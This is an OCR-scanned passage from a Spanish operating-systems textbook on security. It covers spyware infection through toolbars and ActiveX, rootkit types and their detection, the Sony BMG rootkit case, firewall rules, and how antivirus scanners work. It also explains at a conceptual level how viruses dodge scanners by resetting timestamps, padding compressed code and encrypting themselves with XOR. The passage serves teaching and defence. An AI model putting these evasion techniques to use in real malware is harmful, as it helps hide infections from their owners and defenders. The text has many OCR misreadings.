La segunda ruta común es la barra de herramientas infectada. Tanto Internet Explorer como Fi- 
refox soportan barras de herramientas de terceras partes. A Igunos escritores de spyware crean una 
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barra de herramientas agradable que tenga ciertas característica útiles, y después le hacen mucha 
publicidad como un grandioso complemento gratuito. Las personas que instalan la barra de herra¬ 
mientas reciben el spyware. Por ejemplo, la popular barra de herramientas Al exa contiene spywa- 
re. En esencia, este esquema es un caballo deTroya, sólo que se empaqueta de manera distinta. 

La tercera variante de infección es más sinuosa. M uchas páginas Web utilizan una tecnología 
de M icrosoft llamada controles activeX . Estos controles son programas binarios del Pentium que 
se conectan a Internet Explorer y extienden su funcionalidad: por ejemplo, para visualizar tipos es¬ 
peciales de páginas Web con imágenes, audio o video. En principio, esta tecnología es perfectamen¬ 
te legítima: en la práctica es muy peligrosa y tal vez sea el principal método por el que ocurren las 
infecciones de spyware. Este método siempre está dirigido a lE (Internet Explorer) y nunca a Fire- 
fox u otros navegadores. 

Cuando se visita una página con un control activeX, lo que ocurre depende de la configuración 
de seguridad de lE. Si es demasiado baja, el spyware se descarga y se instala de manera automáti¬ 
ca. La razón por la que las personas establecen la configuración de seguridad en un nivel bajo es 
que cuando está en un nivel muy alto, muchos sitios Web no se muestran correctamente (o no se 
muestran por completo), o lE está pidiendo permiso de manera constante para cualquier acción, y 
el usuario no comprende nada de eso. 

A hora suponga que el usuario tiene el nivel de configuración de seguridad demasiado alto. AI 
visitar una página Web, lE detecta el control activeX y muestra un cuadro de diálogo que contiene 
un mensaje proporcionado por la página Web. Este mensaje podría decir algo como 

¿Desea instalar y ejecutar un programa que agilice su acceso a Internet? 

La mayoría de las personas piensa que esto es bueno y hacen clic en ACEPTAR. Y después de es¬ 
to quedan infectados. Los usuarios sofisticados tal vez revisen el resto del cuadro de diálogo, don¬ 
de encontrarán otros dos elementos. Uno es un vínculo al certificado de la página Web (como vimos 
en la sección 9.2.4) que proporciona una CA de la que nunca han oído antes y que no contiene in¬ 
formación útil, aparte del hecho de que la CA afirma que la empresa existe y tuvo suficiente dine¬ 
ro como para pagar por el certificado. El otro es un hipervínculo a una página Web distinta, que 
proporciona la página Web que se está visitando. Su propósito es explicar lo que hace el control ac¬ 
tiveX , pero de hecho puede ser sobre cualquier cosa, y en general explica lo maravilloso que es el 
control activeX y cómo ayudará al usuario a mejorar su experiencia de navegación. Armados con 
esta información falsa, a menudo hasta los usuarios sofisticados hacen clic en SÍ. 

Si hacen clic en NO, lo común es que una secuencia de comandos en la página Web utilice un 
error en lE para tratar de descargar el spyware de todas formas. Si no hay un error disponible para 
explotarlo, puede tratar de descargar el control activeX una y otra vez, y en cada intento lE mues¬ 
tra el mismo cuadro de diálogo. La mayoría de las personas no saben qué hacer en ese punto (van 
al administrador de tareas y cierran lE), por lo que en cierto momento se rinden y hacen clic en SÍ. 
Y quedan infectados. 

A menudo, lo que ocurre a continuación es que el spyware muestra un acuerdo de licencia de 
20 o 30 páginas, escrito en un lenguaje que sólo Geoffrey Chaucero un abogado especializado en¬ 
tenderían. Una vez que el usuario acepta la licencia, puede perder su derecho de demandar al dis¬ 
tribuidor de spyware por consentir que éste se ejecute libremente, aunque algunas veces las leyes 
locales invalidan esas licencias (si la licencia dice "por este medio, el concesionario da al otorgante 
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de la licencia de manera irrevocable el derecho de matar a la madre del concesionario y reclamar su 
herencia", el otorgante de la licencia podría tener problemas para convencer a las cortes cuando quie¬ 
ra cobrar su dinero, a pesar de que el concesionario aceptó las condiciones). 

Acciones que realiza el spyware 

Ahora veamos lo que el spyware hace con frecuencia. Todos los puntasen la siguiente lista son co¬ 
munes. 

1. M odifica la página de inicio del navegador. 

2. M odifica la lista de páginas favoritas (sitios favoritos) del navegador. 

3. Agrega nuevas barras de herramientas al navegador. 

4. Cambia el reproductor de medios predeterminado del usuario. 

5. Cambia el motor de búsqueda predeterminado del usuario. 

6. Agrega nuevos iconos al escritorio de Windows. 

7. Reemplaza los anuncios de pancarta (banners) en las páginas Web con los que elije el mis¬ 
mo spyware. 

8. Coloca anuncios en los cuadros de diálogo estándar de Windows. 

9. Genera un flujo continuo e imparable de anuncios emergentes (pop-up). 

Los primeros tres puntos modifican el comportamiento del navegador, por lo general de tal forma 
que ni reiniciando el sistema se pueden restaurar los valores anteriores. Este ataque se conoce co¬ 
mo secuestro del navegador. Los dos puntos modifican opciones en el registro de Windows y sin 
que el usuario se entere, lo llevan a un reproductor de medios distinto (que muestra los anuncios 
elegidos por el spyware) y a un motor de búsqueda distinto (que devuelve como resultados de las 
búsquedas los sitios Web que el spyware desea). Agregar iconos al escritorio es un intento obvio 
por hacer que el usuario ejecute software recién instalado. Al reemplazar los anuncios de pancarta 
(banners) (imágenes .gif de 468 x 60) en las páginas Web subsiguientes, puede parecer que todas 
las páginas Web que se visitan están anunciando los sitios que el spyware selecciona. Pero el últi¬ 
mo punto es el más molesto: un anuncio emergente que no se puede cerrar, pero que genera de in¬ 
mediato otro anuncio emergente de manera ilimitada, sin que haya forma de detenerlos. Además, 
algunas veces el spyware deshabilita el firewail, elimina el spyware de la competencia y lleva a ca¬ 
bo otras acciones maliciosas. 

M uchos programas de spyware incluyen desinstaladores, pero éstos casi nunca funcionan, por 
lo que los usuarios experimentados no tienen manera de eliminar el spyware. Por fortuna, se está 
creando una nueva industria de software antispyware y las empresas de antivirus existentes están 
empezando a participar. 

No hay que confundir el spyware con el adware, en el cual los distribuidores de software legí¬ 
timo (pero pequeño) ofrecen dos versiones de su producto: uno gratuito con anuncios y otro que 
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tiene un costo, pero no tiene anuncios. Estas empresas son muy ciaras en cuanto a ia existencia de 
dos versiones de su producto, y siempre ofrecen a sus usuarios ia opción de actuaiizar su software 
a ia versión comerciai, para deshacerse de sus anuncios. 

9.7.5 Rootkits 

Un rootkit es un programa o conjunto de programas y archivos que intenta ocuitar su existencia, 
inciuso frente a ios esfuerzos determinados dei propietario de ia máquina infectada por iocaiizario 
y eiiminario. Por io generai, ei rootkit contiene maiware que también se ocuita. Los rootkits se pue¬ 
den instaiar mediante cuaiquiera de ios métodos anaiizados hasta ahora, inciuyendo ios virus, gu¬ 
sanos y spyware, así como por otros medios, uno de ios cuaies anaiizaremos más adeiante. 

Tipos de rootkits 

Ahora vamos a anaiizar ios cinco tipos de rootkits posibies en ia actuaiidad, de abajo hacia arriba. 
En todos ios casos, ia cuestión es: ¿Dónde se ocuita ei rootkit? 

1. Rootkits defirmware. Por io menos en teoría, para ocuitar un rootkit en ei BIOS, éste se 
reprograma y se incluye una copia del rootkit. Dicho rootkit obtendría el control cada vez 
que se iniciara la máquina, y también cada vez que se hiciera una llamada a una función del 
BIOS. Si el rootkit se cifrara a sí mismo después de cada uso y se descifrara antes de cada 
uso, sería muy difícil de detectar. Todavía no se ha observado este tipo de rootkit en la co¬ 
munidad de computadoras. 

2. Rootkits de hipervisor. Un tipo de rootkit muy sigiloso podría ejecutar todo el sistema ope¬ 
rativo y las aplicaciones en una máquina virtual bajo su control. La primera prueba del con¬ 
cepto fue blue pill (una referencia a una película llamada The Matrix), que una hacker 
polaca llamada joanna Rutkowska demostró en el 2006. Por lo general, este tipo de rootkit 
modifica la secuencia de arranque, de tal forma que al encender la máquina se ejecute el hi¬ 
pervisor directamente en el hardware, que a su vez inicia el sistema operativo y sus aplica¬ 
ciones en una máquina virtual. La fortaleza de este método (al igual que el anterior) es que 
no hay nada oculto en el sistema operativo, en las bibliotecas o en los programas, de mane¬ 
ra que los detectores de rootkits que busquen ahí no encontrarán nada. 

3. Rootkits de kernel. El tipo más común de rootkit en la actualidad es uno que infecta al sis¬ 
tema operativo y se oculta en él como un driver de dispositivo, o como un módulo de ker¬ 
nel que se puede cargar de manera opcional. El rootkit puede reemplazar con facilidad a un 
driver extenso, complejo y que cambia con frecuencia, con uno nuevo que contenga el dri¬ 
ver anterior junto con el rootkit. 

4. Rootkits de bibiioteca. Otro lugar en donde se puede ocultar el rootkit es en la biblioteca 
del sistema: por ejemplo, libe en Linux. En esta ubicación el maiware tiene la oportunidad 
de inspeccionar los argumentos y valores de retorno de las llamadas al sistema, y las modi¬ 
fica según sea necesario para mantenerse oculto. 
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5. Rootkits de aplicación. Otro lugar para ocultar un rootkit es dentro de un programa de apli¬ 
cación extenso, en especial uno que cree muchos archivos nuevos mientras se ejecuta (per¬ 
files de usuario, vistas previas de imágenes, etc.). Estos nuevos archivos son buenos lugares 
para ocultar cosas, y a nadie se le hace extraño que existan. 

La figura 9-30 muestra cinco lugares en donde se pueden ocultar los rootkits. 
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Figura 9-30. Cinco lugares en los que se puede ocultar un rootkit. 


Detección de rootkits 

Es difícil detectar los rootkits cuando no se puede confiar en el hardware, el sistema operativo, 
las bibliotecas o las aplicaciones. Por ejemplo, una manera obvia de buscar un rootkit es hacer 
listados de todos los archivos en el disco. Sin embargo, la llamada al sistema que lee un directo¬ 
rio, el procedimiento de biblioteca que realiza esta llamada al sistema y el programa que realiza 
el listado son todos potencial mente maliciosos y podrían censurar los resultados, omitiendo ar¬ 
chivos relacionados con el rootkit. Sin embargo la situación no es irremediable, como veremos a 
continuación. 

Es complicado detectar un rootkit que inicie su propio hipervisor y después ejecute el sistema 
operativo y todas las aplicaciones en una máquina virtual bajo su control, pero no imposible. Para ello, 
hay que analizar con cuidado las discrepancias menores en el rendimiento y la funcionalidad, entre 
una máquina virtual y una real. Garfinkel y sus colaboradores (2007) han sugerido varias de ellas, 
como veremos a continuación. Carpenter y sus colaboradores (2007) también han hablado sobre este 
tema. 

Una clase completa de métodos de detección se basa en el hecho de que el mismo hipervisor 
utiliza recursos físicos, y se puede detectar la pérdida de estos recursos. Por ejemplo, el hipervisor en 
sí necesita usar algunas entradas de la TLB y compite con la máquina virtual por estos escasos re¬ 
cursos. Un programa de detección podría hacer presión sobre la TLB, observar el rendimiento y 
compararlo con el rendimiento anterior obtenido sólo con el hardware. 
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Otra clase de métodos de detección está relacionada con la sincronización, en especial de los 
dispositivos de E/S virtual izados. Suponga que se requieren 100 ciclos de reloj para leer cierto re¬ 
gistro de dispositivos PCI en la máquina real, y que esta vez tiene muchas probabilidades de repro¬ 
ducirse. En un entorno virtual el valor de este registro proviene de la memoria, y su tiempo de 
lectura depende de si se encuentra en la caché de nivel 1 o 2 de la CPU, o en la RAM . Un progra¬ 
ma de detección no tendría dificultades en obligar al registro a cambiar de un estado a otro y medir 
la variabilidad en los tiempos de lectura. Observe que es la variabilidad lo que importa, y no el tiem¬ 
po de lectura. 

Otra área que se puede sondear es el tiempo requerido para ejecutar instrucciones privilegia¬ 
das, en especial las que sólo requieren unos cuantos ciclos de reloj en el hardware real, y requie¬ 
ren cientos o miles de ciclos de reloj cuando se deben emular. Por ejemplo, si al leer cierto registro 
protegido de la CPU se requiere 1 nseg en el hardware real, no hay forma en que se puedan reali¬ 
zar mil millones de interrupciones y emulaciones en 1 segundo. Desde luego que el hipervisor pue¬ 
de hacer trampa al reportar el tiempo emulado en vez del tiempo real en todas las llamadas al 
sistema en las que se involucre el tiempo. El detector puede evitar el tiempo emulado al conectar¬ 
se a una máquina remota o a un sitio Web que proporcione una base de tiempo precisa. Como el 
detector sólo necesita medir los intervalos (por ejemplo, cuánto tiempo se requiere para ejecutar 
mil millones de lecturas de un registro protegido), no importa la variación entre el reloj local y el 
remoto. 

Si ningún hipervisor se ha escabullido entre el hardware y el sistema operativo, entonces el 
rootkit podría estar oculto dentro de este último. Es difícil detectarlo al iniciar la computadora, ya 
que no se pude confiar en el sistema operativo. Por ejemplo, el rootkit podría instalar un gran nú¬ 
mero de archivos cuyos nombres empiecen con "$$$_", y cuando lea directorios para los progra¬ 
mas de usuario nunca reportará la existencia de dichos archivos. 

Una manera de detectar rootkits bajo estas circunstancias es iniciar la computadora desde un 
medio externo confiable, como el CD-ROM/DVD o la memoria USB originales. Así, se puede ex¬ 
plorar el disco mediante un programa antirootkit sin temor deque el mismo rootkit interfiera con la 
exploración. De manera alternativa, se puede realizar un hash criptográfico de cada archivo en el 
sistema operativo, para después comparar los resultados con una lista que se haya creado al momen¬ 
to de instalar el sistema, y que se haya almacenado fuera del mismo, en donde nadie la pueda alte¬ 
rar. O si no se hubieran realizado dichos cálculos de hashes en un principio, se pueden calcular 
desde el CD-ROM o DVD de instalación en ese momento, o sólo hay que comparar los mismos ar¬ 
chivos. 

Los rootkits en las bibliotecas y en los programas de aplicación son más difíciles de ocultar, 
pero si el sistema operativo se cargó desde un medio externo y es confiable, sus hashes también se 
pueden comparar con los hashes que se sabe son buenos y están almacenados en un CD-ROM . 

Hasta ahora hemos analizado los rootkits pasivos, que no interfieren con el software de detec¬ 
ción. También hay rootkits activos, que buscan y destruyen el software de detección de rootkits, o 
que al menos lo modifican para anunciar siempre: "¡NO SE ENCONTRARON ROOTKITS!". Es¬ 
tos rootkits requieren medidas complicadas, pero por fortuna todavía no han aparecido rootkits ac¬ 
tivos en la comunidad de computadoras. 

Hay dos corrientes de opinión sobre lo que se debe hacer después de descubrir un rootkit. U na 
de ellas establece que el administrador del sistema se debe comportar como un cirujano que trata 
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un cáncer: debe extirparlo con mucho cuidado. La otra corriente establece que es demasiado peli¬ 
groso tratar de el i minar el rootkit. Puede haber piezas todavía ocultas. En este punto de vista, la úni¬ 
ca solución es regresar al último respaldo completo que esté limpio. Si no hay un respaldo 
disponible, se requiere una nueva instalación desde el CD-ROM/DVD original. 

EI rootkit de Sony 

En el 2005, Sony B M G liberó varios CDs de audio que contenían un rootkit. M ark Russinovich 
(cofundador del sitio Web de herramientas administrativas para Windows www.sysinternals.com) 
fue quien lo descubrió y ha estado trabajando desde entonces para desarrollar un detector de 
rootkits; además se sorprendió de encontrar un rootkit en su propio sistema. M ark escribió algo 
sobre esto en su blog; pronto la historia estaba por todo Internet y en los medios masivos. Algu¬ 
nos científicos escribieron artículos sobre esto (Arnab y Hutchison, 2006; Bishop y Frincke, 
2006; Felten y Flalderman, 2006; Halderman y Felten, 2006; Leviney colaboradores, 2006). El 
furor resultante tardó años en desaparecer. A continuación veremos una descripción de lo que 
ocurrió. 

Cuando un usuario inserta un CD en la unidad de una computadora Windows, el sistema ope¬ 
rativo busca un archivo llamado autorun.inf que contiene una lista de acciones a realizar; casi 
siempre inicia un programa en el CD (como un asistente de instalación). Por lo general los CDs 
de audio no tienen estos archivos, ya que los reproductores de CD independientes los ignoran si 
están presentes. A parentemente, algún genio en Sony pensó que con inteligencia podría detener la 
piratería de la música al colocar un archivo autorun.inf en algunos de sus CDs, que justo después 
insertaba en una computadora e instalaba de manera silenciosa un rootkit de 12 M B. Después apa¬ 
recía un acuerdo de licencia, que no mencionaba nada acerca del software que se iba a instalar. 
M ientras se mostraba la licencia, el software de Sony comprobaba si había en ejecución uno de 
200 programas de copia conocidos, y de ser así pedía al usuario que los cerrara. Si el usuario es¬ 
taba de acuerdo con la licencia y detenía todos los programas, se reproducía la música: en caso 
contrario no se reproducía. A un en el caso en que el usuario rechazara la licencia, el rootkit per¬ 
manecía instalado. 

El rootkit funcionaba de la siguiente manera. Insertaba en el kernel de Windows varios ar¬ 
chivos cuyos nombres empezaban con $sys$. Uno de estos archivos era un filtro que intercepta¬ 
ba todas las llamadas al sistema relacionadas con la unidad de CD-ROM , y prohibía que todos 
los programas excepto el reproductor de música de Sony leyeran el CD. Con esta acción era im¬ 
posible copiar el CD al disco duro (lo cual es legal). Otro filtro interceptaba todas las llamadas 
que leían listados de archivos, procesos y registros, y eliminaban todas las entradas que empeza¬ 
ban con $sys$ (incluso de programas que no tenían ninguna relación con Sony ni con la música) 
para poder cubrir el rootkit. Este método es bastante estándar para los diseñadores de rootkits 
principiantes. 

Antes de que Russinovich descubriera el rootkit ya se había instalado en muchas compu¬ 
tadoras, lo cual no es muy sorprendente ya que estaba en más de 20 millones de CDs. Dan Ka- 
minsky (2006) estudió la extensión y descubrió que había computadoras infectadas en más de 
500,000 redes. 
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Cuando se difundieron ias noticias, ia reacción iniciai de Sony fue que tenía todo ei derecho 
de proteger su propiedad inteiectuai. En una entrevista en ia Radio Púbiica Nacionai, ei presiden¬ 
te de negocios digitaies giobaies de Sony BM G, de nombreThomas Hesse dijo: "Creo que ia ma¬ 
yoría de ias personas ni siquiera saben io que es un rootkit, entonces, ¿por qué se deberían 
preocupar?". Cuando esta respuesta provocó una tormenta de fuego, Sony se retractó y iiberó un 
parche que eiiminaba ia cobertura sobre ios archivos $sys$, pero mantenía ei rootkit en su iugar. 
Debido a ia presión que cada vez era mayor, Sony iiberó en cierto momento un desinstaiador en 
su sitio Web, pero para poder obtenerio, ios usuarios tenían que proporcionar una dirección de co¬ 
rreo eiectrónico y tenían que estar de acuerdo en que Sony podría enviaries materiai promocionai 
en ei futuro (io que ia mayoría de ias personas iiaman spam). 

A medida que ia historia continuaba, resuitó que ei desinstaiador de Sony contenía faiias téc¬ 
nicas que dejaban a ia computadora infectada muy vuinerabie a ios ataques por Internet. También 
se reveió que ei rootkit contenía código de proyectos de código fuente abierto que vioiaban sus de¬ 
rechos de autor (io cuai permitía ei uso iibre dei software siempre y cuando se iiberara ei código 
fuente). 

Además de un desastre incomparabieen ias reiaciones púbiicas, Sony también se enfrentó a un 
riesgo iegai. Ei estado de Texas demandó a Sony por vioiar su iey antispyware, así como por vio- 
iar su iey de prácticas comerciaies engañosas (ya que ei rootkit se instaiaba aunque se rechazara ia 
iicencia). M ás tarde se presentaron demandas coiectivas en 39 estados. En diciembre dei 2006, es¬ 
tas demandas se resoivieron cuando Sony acordó pagar $4.25 miñones, dejar de inciuir ei rootkit 
en ios CDs futuros y dar a cada víctima ei derecho de descargar tres áibumes de un catáiogo de mú¬ 
sica iimitado. En enero dei 2007, Sony admitió que su software también monitoreaba ios hábitos de 
escucha de sus usuarios y ios reportaba de vueita a Sony, en vioiación de ia iey de ios EE.UU. En 
un acuerdo con ia ETC, Sony acordó pagar una compensación de $150 a ias personas cuyas 
computadoras se dañaron debido a su software. 

Inciuimos aquí ia historia dei rootkit de Sony para beneficio de todos ios iectoresque pudieran 
iiegar a pensar que ios rootkits son una curiosidad académica sin impiicaciones reaies. Si busca 
"Sony rootkit" en Internet, recibirá mucha información adicionai. 


9.8 DEFENSAS 

Con probiemas merodeando por todos iados, ¿hay aiguna esperanza deque ios sistemas puedan ser 
seguros? En reaiidad sí ia hay, y en ias siguientes secciones anaiizaremos aigunas de ias formas en 
que se pueden diseñar e impiementar sistemas para incrementar su seguridad. Uno de ios concep¬ 
tos más importantes es i a defensa en profundidad. La idea básica aquí es que debemos tener va¬ 
rios niveies de seguridad, de manera que si se vioia uno de eiios, aún quedan otros niveies de 
defensa. Piense en una casa con una barda de hierro cerrada, aita y con picos a su ai rededor, detec¬ 
tores de movimiento en ei jardín, dos candados industriaies en ia puerta frontai y un sistema deaiar- 
ma contra robos computarizado en su interior. A unque cada técnica es vaiiosa por sí soia, para robar 
ia casa ei iadrón tendría que vencerías todas. Los sistemas computacionaies con una seguridad 
apropiada son como esta casa, con varios niveies de seguridad. Ahora veremos aigunos de eiios. 
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En realidad las defensas no son jerárquicas, pero empezaremos con las exteriores que son más ge¬ 
nerales, y avanzaremos hacia las más específicas. 


9.8.1 Firewails 

La habilidad de conectar cualquier computadora en cualquier parte con cualquier otra compu¬ 
tadora en cualquier parte es una ventaja con claroscuros. Aunque hay mucho material valioso en 
Web, una computadora conectada a Internet está expuesta a dos tipos de peligros: entrantes y sa¬ 
lientes. Los peligros entrantes incluyen crackers que tratan de entrar a la computadora, así como 
virus, spywarey demás malware. Los peligros salientes incluyen información confidencial como los 
números de tarjetas de crédito, contraseñas, devoluciones de impuestos y todo tipo de informa¬ 
ción corporativa. 

En consecuencia, se requieren mecanismos para mantener los bits "buenos" adentro y los bits 
"malos" afuera. U no de estos métodos es el uso de un firewail, que es tan sólo una adaptación mo¬ 
derna de ese antiguo recurso de seguridad medieval: cavar un foso profundo alrededor del castillo. 
Este diseño obligaba a todos los que entraban o salían del castillo a pasar por un solo puente leva¬ 
dizo, en donde la policía de E/S podía inspeccionarlos. Con las redes es posible el mismo truco: una 
empresa puede tener muchas LANs conectadas en formas arbitrarias, pero todo el tráfico entrante 
y saliente de la empresa pasa de manera obligatoria a través de un puente levadizo electrónico, el 
firewail. 

Flay dos variedades básicas de firewail: de hardware y de software. Por lo general, las empre¬ 
sas que deben proteger sus LANs optan por los firewails de hardware: los individuos en su hogar 
eligen con frecuencia los firewails de software. Primero analizaremos los firewails de hardware. En 
la figura 9-31 se ilustra un firewail de hardware genérico. Aquí, la conexión (cable o fibra óptica) 
del proveedor de red se conecta al firewail, el cual se conecta a la LAN. No pueden entrar paque¬ 
tes a la LAN ni salir de ella sin que el firewail lo apruebe. En la práctica, los firewails se combinan 
a menudo con enrutadores, cajas de resolución de direcciones, sistemas de detección de intrusos y 
otras cosas, pero nuestro enfoque aquí será sobre la funcionalidad del firewail. 


207.68.160.190:80 207.68.160.191:25 207.68.160.192:21 



Figura 9-31. Una vista simplificada de un firewail de hardware que protege a una 
LAN con tres computadoras. 


Los firewails se configuran con reglas que describen lo que puede entrar y lo que puede salir. 
El propietario del firewail puede cambiar las reglas, por lo común a través de una interfaz Web (la 
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mayoría de los firewails tienen un mini servidor Web integrado, para permitir esto). En ei tipo de 
firewaii más simpie, ei firewail sin estado, se inspecciona ei encabezado de cada paquete que pa¬ 
sa por éi y se toma ia decisión de aceptar o rechazar ei paquete, sóio con base en ia información dei 
encabezado y ias regias dei firewaii. La información en ei encabezado dei paquete inciuye ias di¬ 
recciones IP de origen y destino, ios puertos de origen y destino, ei tipo de servicio y ei protocoio. 
Hay otros campos disponibies, pero ocurren raras veces en ias regias. 

En ei ejempio de ia figura 9-31 podemos ver tres servidores, cada uno con una dirección IP 
única de ia forma 207.68.160.x, en donde x es 190, 191 y 192 respectivamente. Estas son ias di¬ 
recciones a ias que se deben enviar ios paquetes para que iieguen a estos servidores. Los paque¬ 
tes entrantes también contienen un número de puerto de 16 bits, que especifica cuái proceso en 
ia máquina debe recibir ei paquete (un proceso puede escuchar en un puerto ei tráfico entrante). A i- 
gunos puertos tienen servicios asociados. En especiai, ei puerto 80 se utiiiza para Web, ei puerto 25 
para ei correo eiectrónico y ei puerto 21 para ei servicio FTP (transferencia de archivos), pero ia 
mayoría de ios demás puertos están disponibies para ios servicios definidos por ei usuario. Bajo es¬ 
tas condiciones, ei firewaii se podría configurar de ia siguiente forma: 


Dirección IP 

Puerto 

Acción 

207.68.160.190 

80 

Aceptar 

207.68.160.191 

25 

Aceptar 

207.68.160.192 

21 

Aceptar 

* 

* 

Rechazar 


Estas regias permiten a ios paquetes ira ia máquina 207.68.160.190, pero sóio si están dirigidos pa¬ 
ra ei puerto 80; todos ios demás puertos en esta máquina están prohibidos y ei firewaii descartará 
en siiencio ios paquetes que se envíen a eiios. De manera simiiar, ios paquetes pueden ira ios otros 
dos servidores si están dirigidos a ios puertos 25 y 21, respectivamente. Ei resto dei tráfico se des¬ 
carta. Con este conjunto de regias es difícii que un atacante obtenga acceso a ia LAN, excepto por 
ios tres servicios púbiicos que se ofrecen. 

A pesar dei firewaii, aún es posibie atacar ia LAN. Por ejempio, si ei servidor Web es apache 
y ei cracker descubre un error en apache que puede expiotar, podría enviar un URL muy iargo a ia 
dirección 207.68.160.190 en ei puerto 80 y forzar un desbordamiento dei búfer, con io cuai contro- 
iaría una de ias máquinas dentro dei firewaii y ia podría utiiizar para ianzar un ataque sobre ias otras 
máquinas en ia LAN. 

Otro ataque potenciai es escribir y pubiicar un juego muitijugador, y iograr que tenga una 
ampiia aceptación. Ei software dei juego necesita cierto puerto para conectarse con otros jugado¬ 
res, por io que ei diseñador dei juego podría seieccionar uno (por ejempio, 9876) e indicar a ios 
jugadores que cambien ia configuración de su firewaii para permitir ei tráfico entrante y saiiente 
en este puerto. Las personas que abran este puerto estarán sujetas a sufrir ataques, io cuai podría 
ser sencido si ei juego contiene un cabaiio de Troya que acepte ciertos comandos remotos y ios 
ejecute. Pero inciuso si ei juego es iegítimo, podría contener errores que se puedan expiotar. En¬ 
tre más puertos estén abiertos, mayor será ia probabiiidad deque un ataque sea exitoso. Cada ho¬ 
yo incrementa ia posibiiidad de que se infiitre un ataque. 
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Además de los firewails sin estado, también hay firewails de estado, que mantienen ei regis¬ 
tro de ias conexiones y ei estado en ei que se encuentran. Estos firewaiis son mejores para vencer 
ciertos tipos de ataques, en especiai ios que están reiacionados con ei estabiecimiento de conexio¬ 
nes. Flay otros tipos de firewaiis que impiementan un IDS (Intrusión Detection System, Sistema de 
detección de intrusos), donde ei firewaii no sóio inspecciona ios encabezados de ios paquetes sino 
también su contenido, en busca de materiai sospechoso. 

Los firewaiis de software (a ios que también se Íes conoce como firewails personales) hacen 
io mismo que ios firewaiis de hardware, pero en software. Son fiitros que se conectan ai código de 
red dentro dei kernei dei sistema operativo y fiitran ios paquetes de ia misma forma en que io hace 
ei firewaii de hardware. 

9.8.2 L os antivirus y las técnicas anti-antivirus 

Los firewaiis tratan de mantener a ios intrusos fuera de ia computadora, pero pueden faiiar de di¬ 
versas formas, como veremos a continuación. En ese caso, ia siguiente iínea de defensa está com¬ 
puesta por ios programas antimaiware, que se conocen comúnmente como programas antlvlrus, 
aunque muchos de eiios también combaten ios gusanos y ei spyware. Los virus tratan de ocuitarse 
y ios usuarios tratan de encontrarios, aigo parecido ai juego dei gato y ei ratón. En este sentido ios 
virus son como ios rootkits, excepto que ia mayoría de ios escritores de virus se enfocan en ei rápi¬ 
do esparcimiento dei virus, en vez de jugar a ias escondidas como ios rootkits. Ahora anaiizaremos 
aigunas de ias técnicas utiiizadas por ei software antivirus y ia forma en queVirgiiio, ei escritor de 
virus, responde a eiios. 

E xploradores de virus 

Sin duda, ei usuario promedio no va a poder encontrar muchos de i os vi rus que hacen su mejor esfuer¬ 
zo por ocuitarse, por io que se ha desarroiiado un mercado para ei software antivirus. A continuación 
anaiizaremos i a forma en que funciona este software. Las empresas de software antivi rus tienen iabo- 
ratorios en ios que científicos dedicados trabajan iargas horas para rastrear y comprender ios nuevos 
virus. Ei primer paso es hacer que ei virus infecte un programa que no hace nada, conocido como ar¬ 
chivo señuelo (goatfile), para obtener una copia dei virus en su forma más pura. Ei siguiente paso es 
hacer un iistado exacto dei código dei virus e introducido en ia base de datos de virus conocidos. Las 
empresas compiten por ei tamaño de sus bases de datos. Ei hecho de inventar nuevos virus sóio para 
aumentar ei tamaño de ia base de datos no se considera una buena conducta deportiva. 

Una vez que se instaia un programa antivirus en ia máquina de un ciiente, io primero que ha¬ 
ce es expiorar todos ios archivos ejecutabies en ei disco, en busca de cuaiquiera de ios virus en ia 
base de datos de virus conocidos. La mayoría de ias empresas antivirus tienen un sitio Web, desde 
ei cuai ios ciientes pueden descargar ias descripciones de virus recién descubiertos en sus bases de 
datos. Si ei usuario tiene 10,000 archivos y ia base de datos tiene 10,000 virus, sin duda se requie¬ 
re cierta programación inteiigente para agiiizar ei proceso. 

Como surgen variantes menores de virus conocidos todo ei tiempo, se necesita una búsqueda 
difusa para asegurar que un cambio de 3 bytes en un virus no evite su detección. Sin embargo, ias 
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búsquedas difusas no sólo son más lentas que las exactas, sino que pueden activar falsas alarmas 
(falso positivo): es decir, advertencias sobre archivos legítimos que sólo contienen cierto código al¬ 
go similar a un virus reportado en Pakistán hace 7 años. ¿Qué se supone que debe hacer el usuario 
con el siguiente mensaje?: 

¡ADVERTENCIA!: El archivo xyz.exe puede contener el virus lahore-9x. ¿Desea eliminarlo? 

Entre más virus haya en la base de datos y más amplio sea el criterio para declarar una ocurrencia, 
habrá más falsas alarmas. Si hay demasiadas, el disgustado usuario se rendirá. Pero si el explorador 
de virus insiste en una ocurrencia muy cercana, puede pasar por alto algunos virus modificados. Ob¬ 
tener una detección acertada es un balance delicado de heurística. En teoría, el laboratorio debería 
tratar de identificar cierto código básico en el virus que no tenga probabilidades de cambiar, y utili¬ 
zarlo como la firma del virus que se debe buscar. 

El hecho de que el disco se haya declarado libre de vi rus la semana pasada no significa que aún 
lo esté, por lo cual hay que ejecutar el explorador de virus con frecuencia. Como la exploración es 
lenta, es más eficiente comprobar sólo los archivos que se han modificado desde la fecha de la úl¬ 
tima exploración. El problema es que un virus inteligente restablecerá la fecha de un archivo infec¬ 
tado a su fecha original, para evitar ser detectado. La respuesta del programa antivirus a esta acción 
es comprobar la fecha en que se modificó el directorio que contiene el archivo. L a respuesta del vi¬ 
rus a esta acción es restablecer también la fecha del directorio. Este es el inicio del juego del gato 
y el ratón que mencionamos antes. 

Otra forma en que el programa antivirus puede detectar la infección de archivos es registrar y 
almacenar en el disco las longitudes de todos los archivos. Si un archivo creció en tamaño desde la 
última comprobación, podría estar infectado como se muestra en la figura 9-32(a y b). Sin embar¬ 
go, un virus inteligente puede evitar la detección al comprimir el programa y rellenar el espacio li¬ 
bre del archivo para que tenga su longitud original. Para que este esquema pueda funcionar, el virus 
debe contener procedimientos tanto de compresión como de descompresión, como se muestra en la 
figura 9-32(c). Otra forma en que el virus puede tratar de evitar la detección es asegurarse de que 
su representación en el disco no tenga la apariencia de su representación en la base de datos del soft¬ 
ware antivirus. Una manera de lograr este objetivo es que se cifre a sí mismo con una clave distin¬ 
ta para cada archivo infectado. Antes de realizar una nueva copia, el virus genera una clave de 
cifrado aleatoria de 32 bits; por ejemplo, aplicando un XOR al tiempo actual y el contenido de (por 
ejemplo) las palabras de memoria 72,008 y 319,992. Después aplica un XOR a su código con esta 
clave, palabra por palabra, para producir el virus cifrado que se almacena en el archivo infectado, 
como se muestra en la figura 9-32(d). La clave se almacena en el archivo. Para fines de mantener¬ 
se en secreto no es ideal colocar la clave en el archivo, pero el objetivo aquí es frustrar al explora¬ 
dor de virus, no evitar que los científicos dedicados en el laboratorio antivirus apliquen ingeniería 
